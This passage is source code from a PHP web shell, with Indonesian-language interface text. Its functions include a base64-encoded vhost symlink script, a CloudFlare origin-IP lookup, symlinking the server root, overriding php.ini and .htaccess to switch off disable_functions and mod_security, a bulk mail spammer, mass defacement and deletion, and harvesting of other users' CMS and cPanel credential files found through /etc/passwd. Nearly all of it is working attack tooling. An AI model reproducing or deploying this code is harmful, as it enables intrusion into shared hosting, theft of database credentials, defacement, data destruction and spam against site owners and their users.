NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICI8YnI+PGJyPjxicj48Zm9udCBjb2xvcj1yZWQ+RG9uZSAhISA8aW1nIHNyYz0naHR0cDovL2kuaW1ndXIuY29tL0x0dWtFSk4ucG5nJyAgaGVpZ2h0PSc3MCcgd2lkdGg9JzYwJz48L2ZvbnQ+IjsNCg==';
$file = fopen("xaivhost.cin","w+");
$write = fwrite($file,base64_decode($xaivhost));
fclose($file);
chmod("xaivhost.cin", 0755);
echo "<center><a href='xaivhost' target='_blank'><font color='lime'>>> XaiVhosts <<</font></a></center>";
}}
elseif($_GET['do'] == 'phpinfo') {
@ob_start();eval("phpinfo();");$buff = @ob_get_contents();@ob_end_clean();$awal = strpos($buff,"<body>")+6;$akhir = strpos($buff,"</body>");echo "<div class='mybox'><div class='phpinfo'>".substr($buff,$awal,$akhir-$awal)."</div></div>";
} 
elseif($_GET['bypass'] == 'cloudfl') {
echo '<form method="post">
<center>
<h3>Bypass CloudFlare</h3>
<select class="inputz" name="krz">
<option>ftp</option>
<option>direct-connect</option>
<option>webmail</option>
<option>cpanel</option>
</select>
<input class="inputz" type="text" name="target" value="url">
<input class="inputzbut" type="submit" value="Bypass!"></center>';
$target = $_POST['target'];
    # Bypass From FTP
    if ($_POST['krz'] == "ftp") {
        $ftp = gethostbyname("ftp." . "$target");
        echo "<br><p align='center' dir='ltr'>
        <font color='white'>CORRECT IP IS: </font>
        <font color='lime'>$ftp</font></p>";
    }
    # Bypass From Direct-Connect
    if ($_POST['krz'] == "direct-connect") {
        $direct = gethostbyname("direct-connect." . "$target");
        echo "<br><p align='center' dir='ltr'>
        <font color='white'>CORRECT IP IS: </font>
        <font color='lime'>$direct</font></p>";
    }
    # Bypass From Webmail
    if ($_POST['krz'] == "webmail") {
        $web = gethostbyname("webmail." . "$target");
        echo "<br><p align='center' dir='ltr'>
        <font color='white'>CORRECT IP IS: </font>
        <font color='lime'>$web</font></p>";
    }
    # Bypass From Cpanel
    if ($_POST['krz'] == "cpanel") {
        $cpanel = gethostbyname("cpanel." . "$target");
        echo "<br><p align='center' dir='ltr'>
        <font color='white'>CORRECT IP IS: </font>
        <font color='lime'>$cpanel</font></p>";
    }
}
elseif($_GET['bypass'] == 'vhosts'){
	echo "<form method='post' action=''>";
	echo "<center><h3>Bypass Symlink vHost</h3>";
	echo "<input type='submit' value='Bypass!' name='jembut'>";
		if (isset($_POST['jembut'])){
                        mkdir('symvhosts', 0755);
                        chdir('symvhosts');
                        system('ln -s / kuda.txt');
			$fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBrdWRhLmh0bWwNCkFkZFR5cGUgdHh0IC5waHANCkFkZEhhbmRsZXIgdHh0IC5waHA=';
			$file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","kuda.txt");
			$rt="<a href='symvhosts/kuda.txt' target='_blank'><font color='lime'>Bypassed Successfully!</font></a>";
	echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br><br>$rt<br>Note: Kalo Forbidden pas ngebuka /var/www/vhosts/domain.com/ harap tambahkan httpdocs ex:/var/www/vhosts/domain.com/httpdocs/</center>";} echo "</form>";
}
elseif($_GET['bypass'] == 'disablefunc'){
		echo "<center><h3>Bypass Disable Functions</h3>";
		echo "<form method='post'><input type='submit' name='ini' value='php.ini'>&nbsp;<input type='submit' name='htce' value='.htaccess'>&nbsp;<input type='submit' name='litini' value='Litespeed'></form>";
		if(isset($_POST['ini']))
{
		$file = fopen("php.ini","w");
		echo fwrite($file,"safe_mode = OFF
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF");
		fclose($file);
		echo " <a href='php.ini' target='_blank'>Click Here!</a>";
}		if(isset($_POST['htce']))
{
		$file = fopen(".htaccess","w");
		echo fwrite($file,"<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>");
		fclose($file);
		echo " htaccess successfully created!";
}               if(isset($_POST['litini'])){
		$iniph = "PD9waHANCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsic3MiXTsNCj8+";
		$byph = "c2FmZV9tb2RlID0gT0ZGXG5kaXNhYmxlX2Z1bmN0aW9ucyA9IE5PTkVcbnNhZmVfbW9kZV9naWQgPSBPRkZcbm9wZW5fYmFzZWRpciA9IE9GRg==";
		$comp = "PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPlxuU2VjRmlsdGVyRW5naW5lIE9mZlxuU2VjRmlsdGVyU2NhblBPU1QgT2ZmXG48L0lmTW9kdWxlPg==";
		file_put_contents("php.ini",base64_decode($byph));
		file_put_contents("ini.php",base64_decode($iniph));
		file_put_contents(".htaccess",base64_decode($comp));
		echo "<script>alert('Disable Functions in Litespeed Created'); hideAll();</script>";
		echo"</center>";
}
}
elseif($_GET['do'] == 'spam_mail'){
if(isset($_POST['oksend']) AND !empty($_POST['fremail']) AND !empty($_POST['tremail']) AND !empty($_POST['subjectt']) AND !empty($_POST['msgmail']) AND !empty($_POST['ctmail']) AND !empty($_POST['frname']) AND is_numeric($_POST['ctmail'])){
$FromEmail = $_POST['fremail'];
$TargetEmail = $_POST['tremail'];
$Subject = $_POST['subjectt'];
$Message = $_POST['msgmail'];
$Count = $_POST['ctmail'];
if(isset($_POST['htmlcontents'])){
$headers = "From: ".$_POST['frname']." <".$FromEmail.">rn";
$headers .= "MIME-Version: 1.0rn";
$headers .= "Content-Type: text/html; charset=ISO-8859-1rn";
$linenterr = '<br/>-<br/>';
}else{
$headers = "From: ".$_POST['frname']." <".$FromEmail.">";
$linenterr = '
-
';
}
$i=1;
while($i <= $Count){
if($Count==1){
$Subjectz = $Subject;
$Messagez = $Message;
}else{
$Subjectz = $Subject.' - '.$i;
$Messagez = $Message.$linenterr.$i;
}
if(mail($TargetEmail, $Subjectz, $Messagez, $headers)){
echo '<center><font color="lime">'.$i.' - Success Cok!</font></center><br>';
}else{
echo '<center><font color="red">'.$i.' - Failed Cok!</font></center><br>';
}
$i=$i+1;
}
}else{
echo '<form method="post">
<center><h3>Mail Spammer</h3>
<p>Gunakan Email Pengirim Yang Asli Agar Pesan Tidak Dianggap Spam</p><br/>
Sender Email:<br/>
<input type="email" size="40" name="fremail" placeholder="[email protected]" value="'.htmlspecialchars($_POST['fremail']).'"><br/><br/>
Sender Name:<br/>
<input type="text" size="40" name="frname" placeholder="Unknown" value="'.htmlspecialchars($_POST['frname']).'"><br/><br/>
Target Email:<br/>
<input type="email" size="40" name="tremail" placeholder="[email protected]" value="'.htmlspecialchars($_POST['tremail']).'"><br/><br/>
Subject:<br/>
<input type="text" size="40" name="subjectt" placeholder="Maqlo Heker.." value="'.htmlspecialchars($_POST['subjectt']).'"><br/><br/>
Message:<br/>
<textarea cols="30" rows="8" name="msgmail" placeholder="gue gans, tq.">'.htmlspecialchars($_POST['msgmail']).'</textarea><br/><br/>
Spam Count:<br/>
<input type="number" size="40" name="ctmail" placeholder="10" value="'.htmlspecialchars($_POST['ctmail']).'"><br/><br/>
<input type="checkbox" name="htmlcontents" value="HTML Contents">HTML Contents:<br/><br/>
<input type="submit" name="oksend" value="Send!"></form></center>';
}
}
elseif($_GET['do'] == 'mass_deface') {
	echo "<form action='' method='post'>";
	$dirr=$_POST['d_dir'];
	$index = $_POST["script"];
	$index = str_replace('"',"'",$index);
	$index = stripslashes($index);
	function edit_file($file,$index){
		if (is_writable($file)) {
		clear_fill($file,$index);
		echo "<center><span style='color:lime;'><strong> [+] Nyabun 100% Successfull </strong></span></center><br>";
		} 
		else {
			echo "<center><span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span></center><br>";
			}
			}
	function hapus_massal($dir,$namafile) {
		if(is_writable($dir)) {
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				$dirc = "$dir/$dirb";
				$lokasi = $dirc.'/'.$namafile;
				if($dirb === '.') {
					if(file_exists("$dir/$namafile")) {
						unlink("$dir/$namafile");
					}
				} elseif($dirb === '..') {
					if(file_exists("".dirname($dir)."/$namafile")) {
						unlink("".dirname($dir)."/$namafile");
					}
				} else {
					if(is_dir($dirc)) {
						if(is_writable($dirc)) {
							if(file_exists($lokasi)) {
								echo "[<font color=lime>DELETED</font>] $lokasi<br>";
								unlink($lokasi);
								$idx = hapus_massal($dirc,$namafile);
							}
						}
					}
				}
			}
		}
	}
	function clear_fill($file,$index){
		if(file_exists($file)){
			$handle = fopen($file,'w');
			fwrite($handle,'');
			fwrite($handle,$index);
			fclose($handle);  } }

	function gass(){
		global $dirr , $index ;
		chdir($dirr);
		$me = str_replace(dirname(__FILE__).'/','',__FILE__);
		$files = scandir($dirr) ;
		$notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
		sort($files);
		$n = 0 ;
		foreach ($files as $file){
			if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
				echo "<center><span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
				edit_file($file,$index);
				flush();
				$n = $n +1 ;
				} 
				}
				echo "<br>";
				echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
					}
	function ListFiles($dirrall) {

    if($dh = opendir($dirrall)) {

       $files = Array();
       $inner_files = Array();
       $me = str_replace(dirname(__FILE__).'/','',__FILE__);
       $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
        while($file = readdir($dh)) {
            if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
                if(is_dir($dirrall . "/" . $file)) {
                    $inner_files = ListFiles($dirrall . "/" . $file);
                    if(is_array($inner_files)) $files = array_merge($files, $inner_files);
                } else {
                    array_push($files, $dirrall . "/" . $file);
                }
            }
			}

			closedir($dh);
			return $files;
		}
	}
	function gass_all(){
		global $index ;
		$dirrall=$_POST['d_dir'];
		foreach (ListFiles($dirrall) as $key=>$file){
			$file = str_replace('//',"/",$file);
			echo "<center><strong>$file</strong> ===>";
			edit_file($file,$index);
			flush();
		}
		$key = $key+1;
	echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
	function sabun_massal($dir,$namafile,$isi_script) {
		if(is_writable($dir)) {
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				$dirc = "$dir/$dirb";
				$lokasi = $dirc.'/'.$namafile;
				if($dirb === '.') {
					file_put_contents($lokasi, $isi_script);
				} elseif($dirb === '..') {
					file_put_contents($lokasi, $isi_script);
				} else {
					if(is_dir($dirc)) {
						if(is_writable($dirc)) {
							echo "[<font color=lime>DONE</font>] $lokasi<br>";
							file_put_contents($lokasi, $isi_script);
							$idx = sabun_massal($dirc,$namafile,$isi_script);
						}
					}
				}
			}
		}
	}
	if($_POST['mass'] == 'onedir') {
        echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:white;' name='index' rows='10' cols='67'>
";
        $ini="http://";
        $mainpath=$_POST[d_dir];
        $file=$_POST[d_file];
        $dir=opendir("$mainpath");
        $code=base64_encode($_POST[script]);
        $indx=base64_decode($code);
        while($row=readdir($dir)){
        $start=@fopen("$row/$file","w+");
        $finish=@fwrite($start,$indx);
        if ($finish){
            echo"$ini$row/$file
";
            }
        }
        echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>
";
        $mainpath=$_POST[d_dir];$file=$_POST[d_file];
        $dir=opendir("$mainpath");
        $code=base64_encode($_POST[script]);
        $indx=base64_decode($code);
        while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
        $finish=@fwrite($start,$indx);
        if ($finish){echo '<a href="http://'.$row .'/'.$file.'" target="_blank">http://'.$row.'/'.$file.'</a><br>'; }
        }

    }
	elseif($_POST['mass'] == 'sabunmassal') { gass(); }
	elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
	elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
	elseif($_POST['mass'] == 'massdeface') {
		echo "<div style='margin: 5px auto; padding: 5px'>";
		sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
		echo "</div>";	
		echo "</div>"; }
	else {
		echo "
		<center><font style='text-decoration: underline;'>
		Select Type:<br>
		<select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
		<option value=\"onedir\">Mass Deface 1 Dir</option>
		<option value=\"massdeface\">Mass Deface ALL Dir</option>
		<option value=\"sabunmassal\">Sabun Massal Di Tempat</option>
		<option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
		<option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
		Folder:<br>
		<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
		Filename:<br>
		<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
		Index File:<br>
		<textarea name='script' style='width: 450px; height: 200px;'>Visited By Mr.xBarakuda</textarea><br>
		<input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
		</form></font></center>";
		}
}
elseif($_GET['do'] == 'config') {
    $idx = mkdir("kuda_config", 0777);
    $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI
Require None
Satisfy Any
AddType application/x-httpd-cgi .cin
AddHandler cgi-script .cin
AddHandler cgi-script .cin";
    $htc = fopen("kuda_config/.htaccess","w");
    fwrite($htc, $isi_htc);
    fclose($htc);
    if(preg_match("/vhosts|vhost/", $dir)) {
        $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
        $vhost = "";
        $file = "kuda_config/vhost.cin";
        $handle = fopen($file ,"w+");
        fwrite($handle ,base64_decode($vhost));
        fclose($handle);
        chmod($file, 0755);
        if(exe("cd kuda_config && ./vhost.cin")) {
            echo "<center><a href='$link_config/kuda_config'><font color=lime>DONE</font></a></center>";
        } else {
            echo "<center><a href='$link_config/kuda_config/vhost.cin'><font color=lime>DONE</font></a></center>";
        }
 
    } else {
        $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red><i>Can't read /etc/passwd</i></font></pre>");
        while($passwd = fgets($etc)) {
            if($passwd == "" || !$etc) {
                echo "<font color=red><i>Can't read /etc/passwd</i></font>";
            } else {
                preg_match_all('/(.*?):x:/', $passwd, $user_config);
                foreach($user_config[1] as $user_kuda) {
                    $user_config_dir = "/home/$user_kuda/public_html/";
                    if(is_readable($user_config_dir)) {
                        $grab_config = array(
                            "/home/$user_kuda/.my.cnf" => "cpanel",
                            "/home/$user_kuda/.accesshash" => "WHM-accesshash",
                            "$user_config_dir/po-content/config.php" => "Popoji",
                            "$user_config_dir/vdo_config.php" => "Voodoo",
                            "$user_config_dir/bw-configs/config.ini" => "BosWeb",
                            "$user_config_dir/config/koneksi.php" => "Lokomedia",
                            "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
                            "$user_config_dir/clientarea/configuration.php" => "WHMCS",
                            "$user_config_dir/whm/configuration.php" => "WHMCS",
                            "$user_config_dir/whmcs/configuration.php" => "WHMCS",
                            "$user_config_dir/forum/config.php" => "phpBB",
                            "$user_config_dir/sites/default/settings.php" => "Drupal",
                            "$user_config_dir/config/settings.inc.php" => "PrestaShop",
                            "$user_config_dir/app/etc/local.xml" => "Magento",
                            "$user_config_dir/joomla/configuration.php" => "Joomla",
                            "$user_config_dir/configuration.php" => "Joomla",
                            "$user_config_dir/wp/wp-config.php" => "WordPress",
                            "$user_config_dir/wordpress/wp-config.php" => "WordPress",
                            "$user_config_dir/wp-config.php" => "WordPress",
                            "$user_config_dir/admin/config.php" => "OpenCart",
                            "$user_config_dir/slconfig.php" => "Sitelok",
                            "$user_config_dir/application/config/database.php" => "Ellislab");
                        foreach($grab_config as $config => $nama_config) {
                            $ambil_config = file_get_contents($config);
                            if($ambil_config == '') {
                            } else {
                                $file_config = fopen("kuda_config/$user_kuda-$nama_config.txt","w");
                                fputs($file_config,$ambil_config);
                            }
                        }
                    }      
                }
            }  
        }
    echo "<center><a href='?dir=$dir/kuda_config'><font color=lime>DONE</font></a></center>";
    }
}
elseif($_GET['do'] == 'configv2') {
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
echo '<script>alert("Tidak bisa di gunakan di server windows")</script>';
exit;
}
if($_POST){	if($_POST['config'] == 'symvhosts') {
@mkdir("kuda_symvhosts", 0777);
exe("ln -s / kuda_symvhosts/root");
$htaccess="Options Indexes FollowSymLinks
DirectoryIndex kuda.html
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any";
@file_put_contents("kuda_symvhosts/.htaccess",$htaccess);
$etc_passwd=$_POST['passwd'];
$etc_passwd=explode("
",$etc_passwd);
foreach($etc_passwd as $passwd){
$pawd=explode(":",$passwd);
$user =$pawd[5];
$kuda = preg_replace('//var/www/vhosts//', '', $user);
if (preg_match('/vhosts/i',$user)){
exe("ln -s ".$user."/httpdocs/wp-config.php kuda_symvhosts/".$kuda."-Wordpress.txt");
exe("ln -s ".$user."/httpdocs/configuration.php kuda_symvhosts/".$kuda."-Joomla.txt");
exe("ln -s ".$user."/httpdocs/config/koneksi.php kuda_symvhosts/".$kuda."-Lokomedia.txt");
exe("ln -s ".$user."/httpdocs/forum/config.php kuda_symvhosts/".$kuda."-phpBB.txt");
exe("ln -s ".$user."/httpdocs/sites/default/settings.php kuda_symvhosts/".$kuda."-Drupal.txt");
exe("ln -s ".$user."/httpdocs/config/settings.inc.php kuda_symvhosts/".$kuda."-PrestaShop.txt");
exe("ln -s ".$user."/httpdocs/app/etc/local.xml kuda_symvhosts/".$kuda."-Magento.txt");
exe("ln -s ".$user."/httpdocs/admin/config.php kuda_symvhosts/".$kuda."-OpenCart.txt");
exe("ln -s ".$user."/httpdocs/application/config/database.php kuda_symvhosts/".$kuda."-Ellislab.txt"); 
}}}
if($_POST['config'] == 'symlink') {
@mkdir("kuda_symconfig", 0777);
@symlink("/","kuda_symconfig/root");
$htaccess="Options Indexes FollowSymLinks
DirectoryIndex kuda.html
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any";
@file_put_contents("kuda_symconfig/.htaccess",$htaccess);}
if($_POST['config'] == '404') {
@mkdir("kuda_sym404", 0777);
@symlink("/","kuda_sym404/root");
$htaccess="Options Indexes FollowSymLinks
DirectoryIndex kuda.html
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any
IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=*
IndexIgnore *.txt404
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} ^.*kuda_sym404 [NC]
RewriteRule .txt$ %{REQUEST_URI}404 [L,R=302.NC]";
@file_put_contents("kuda_sym404/.htaccess",$htaccess);
}
if($_POST['config'] == 'grab') {
mkdir("kuda_configv2", 0777);
$isi_htc = "Options all
Require None
Satisfy Any";
$htc = fopen("kuda_configv2/.htaccess","w");
fwrite($htc, $isi_htc);	
}
$passwd = $_POST['passwd'];

preg_match_all('/(.*?):x:/', $passwd, $user_config);
foreach($user_config[1] as $user_kuda) {
$grab_config = array(
"/home/$user_kuda/.accesshash" => "WHM-accesshash",
"/home/$user_kuda/public_html/config/koneksi.php" => "Lokomedia",
"/home/$user_kuda/public_html/forum/config.php" => "phpBB",
"/home/$user_kuda/public_html/sites/default/settings.php" => "Drupal",
"/home/$user_kuda/public_html/config/settings.inc.php" => "PrestaShop",
"/home/$user_kuda/public_html/app/etc/local.xml" => "Magento",
"/home/$user_kuda/public_html/admin/config.php" => "OpenCart",
"/home/$user_kuda/public_html/application/config/database.php" => "Ellislab",
"/home/$user_kuda/public_html/vb/includes/config.php" => "Vbulletin",
"/home/$user_kuda/public_html/includes/config.php" => "Vbulletin",
"/home/$user_kuda/public_html/forum/includes/config.php" => "Vbulletin",
"/home/$user_kuda/public_html/forums/includes/config.php" => "Vbulletin",
"/home/$user_kuda/public_html/cc/includes/config.php" => "Vbulletin",
"/home/$user_kuda/public_html/inc/config.php" => "MyBB",
"/home/$user_kuda/public_html/includes/configure.php" => "OsCommerce",
"/home/$user_kuda/public_html/shop/includes/configure.php" => "OsCommerce",
"/home/$user_kuda/public_html/os/includes/configure.php" => "OsCommerce",
"/home/$user_kuda/public_html/oscom/includes/configure.php" => "OsCommerce",
"/home/$user_kuda/public_html/products/includes/configure.php" => "OsCommerce",
"/home/$user_kuda/public_html/cart/includes/configure.php" => "OsCommerce",
"/home/$user_kuda/public_html/inc/conf_global.php" => "IPB",
"/home/$user_kuda/public_html/wp-config.php" => "Wordpress",
"/home/$user_kuda/public_html/wp/test/wp-config.php" => "Wordpress",
"/home/$user_kuda/public_html/blog/wp-config.php" => "Wordpress",
